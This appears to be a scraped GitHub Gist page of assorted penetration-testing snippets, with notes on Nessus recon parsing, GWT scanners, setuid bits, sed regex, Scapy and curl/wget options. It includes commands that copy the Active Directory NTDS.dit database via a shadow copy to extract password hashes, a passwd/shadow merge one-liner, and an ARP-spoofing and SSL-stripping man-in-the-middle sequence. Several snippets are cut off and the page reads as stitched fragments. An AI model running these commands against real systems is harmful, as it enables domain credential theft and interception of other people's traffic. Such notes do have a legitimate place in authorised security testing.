Skip to content

Instantly share code, notes, and snippets.

#use to speed up recon when targeting large ip ranges
1. scan targets with nessus
2. filter using #10107 plugin
3. save html report
4. extract urls using this:
#extract IP
grep "<H2 style=\"COLOR" nessus_10107.html | awk -F ">" '{print $2}' > col1
#extract ports
grep ")</H2><SPAN class=" nessus_10107.html | awk -F "/" '{print $2}' | awk -F ")" '{print $1}' > col2
#merge IP:ports
Microsoft stores the Active Directory data in tables in a proprietary ESE database format. The database is contained in the NTDS.dit (%SystemRoot%\ntds\NTDS.dit) file.
This file is encrypted to prevent any data extraction, so we will need to acquire the key to be able to perform the extraction of the target data.
The required Password Encryption Key is stored in the NTDS.dit file, but is encrypted itself with the BOOTKEY.
To obtain this BOOTKEY, we need to acquire a copy of the SYSTEM registry hive (%SystemRoot%\System32\config\System) from the same Domain Controller as we acquired the NTDS.dit file.
Extract NTDS/SYSTEM from a domain controller:
net start vss
vssadmin create shadow /for=c:
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp
grep : /etc/security/passwd > pt1; grep passw passwd | awk '{print $3}' > pt2; paste -d' ' pt1 pt2 > pt3; sed -e 's/ //g' pt3 > passwd_w_shadow; rm pt*
GWT support (according to the vendors):
Acunetix
NTOSpider
WebInspect
AppScan
ZAP
Tested:
Burp + Gwtscan.jar: works ~
GWT-Penetration-Testing-Toolset:
setuid (4000)
---s------ allow owner rights temporarily (eg: mount)
chmod 4755 :
-rwxr-xr-x
-rwsr-xr-x
setgid (2000)
------s--- allow owner group rights temporarily
chmod 2744 :
-rwxr--r--
^ (Caret) = match expression at the start of a line, as in ^A.
$ (Question) = match expression at the end of a line, as in A$.
\ (Back Slash) = turn off the special meaning of the next character, as in \^.
[ ] (Brackets) = match any one of the enclosed characters, as in [aeiou].
Use Hyphen "-" for a range, as in [0-9].
[^ ] = match any one character except those enclosed in [ ], as in [^0-9].
. (Period) = match a single character of any value, except end of line.
* (Asterisk) = match zero or more of the preceding character or expression.
\{x,y\} = match x to y occurrences of the preceding.
\{x\} = match exactly x occurrences of the preceding.
replace:
sed -e 's/oldtext/newtext/g'
Removing the last three characters from every filename
cat files | sed 's/\(.*\).../\1/'
Removing first character from each filename/string
cat files |sed 's/.\(.*\)/\1/'
Removing last character from each filename/string
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listen-port>
./ssltrip.py -l <listen-port>
arpspoof -i eth0 -t <target_IP> <gateway_IP>
@ddouhine
ddouhine / Scapy
Last active September 15, 2015 08:24
conf
show_interfaces()
conf.iface="eth1"
conf.color_theme=RastaTheme()
load_session("/var/session")
save_session("/var/session")
ls(IP)
a=IP(dst="192.168.0.1")
c=TCP(dport="25")
wget --header "Cookie: chocolate=AKAR6yG2ZFQo5N6I9ONSmygsW0f" --header "User-Agent: Mozilla/4.0" --header "Accept: text/html" -i url.txt -p
write output in a file:
curl http://1.1.1.1 -o output
change UserAgent:
curl -A "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" http://1.1.1.1
http-ntlm auth:
curl --ntlm -u 'DOMAIN\user:passwd' http://1.1.1.1